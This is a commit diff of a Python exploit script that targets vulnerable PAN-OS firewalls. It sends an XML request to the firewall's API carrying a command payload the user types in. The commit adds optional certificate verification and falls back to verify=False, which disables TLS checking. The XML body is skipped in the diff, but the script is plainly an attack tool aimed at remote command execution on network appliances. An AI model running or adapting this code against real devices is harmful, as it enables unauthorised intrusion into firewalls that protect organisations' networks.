| 1 | 1 | | import requests |
| 2 | 2 | | |
| 3 | | - | def exploit_firewall(target_ip, payload): |
| | 3 | + | def exploit_firewall(target_ip, payload, root_ca=None): |
| 4 | 4 | | url = f"https://{target_ip}/api/" |
| 5 | 5 | | |
| 6 | 6 | | data = f"""<?xml version="1.0" encoding="UTF-8"?> |
| skipped 8 lines |
| 15 | 15 | | } |
| 16 | 16 | | |
| 17 | 17 | | try: |
| 18 | | - | response = requests.post(url, headers=headers, data=data, timeout=5) |
| | 18 | + | if root_ca: |
| | 19 | + | response = requests.post(url, headers=headers, data=data, timeout=5, verify=root_ca) |
| | 20 | + | else: |
| | 21 | + | response = requests.post(url, headers=headers, data=data, timeout=5, verify=False) |
| 19 | 22 | | |
| 20 | 23 | | response.raise_for_status() |
| 21 | 24 | | |
| skipped 12 lines |
| 34 | 37 | | target_ip = input("Enter the IP address of the vulnerable PAN-OS firewall (or 'q' to quit): ") |
| 35 | 38 | | if target_ip.lower() == 'q': |
| 36 | 39 | | break |
| | 40 | + | root_ca = input("Enter the path to the root CA certificate (leave blank to disable certificate verification): ").strip() |
| 37 | 41 | | payload = input("Enter the payload to execute: ") |
| 38 | | - | exploit_firewall(target_ip, payload) |
| | 42 | + | exploit_firewall(target_ip, payload, root_ca) |
| 39 | 43 | | |
| 40 | 44 | | if __name__ == "__main__": |
| 41 | 45 | | main() |
| | 46 | + | |
| 42 | 47 | | |
| 43 | 48 | | |
DrewskyDev
committed
with
GitHub
1 month ago
1 parent ce65b7b5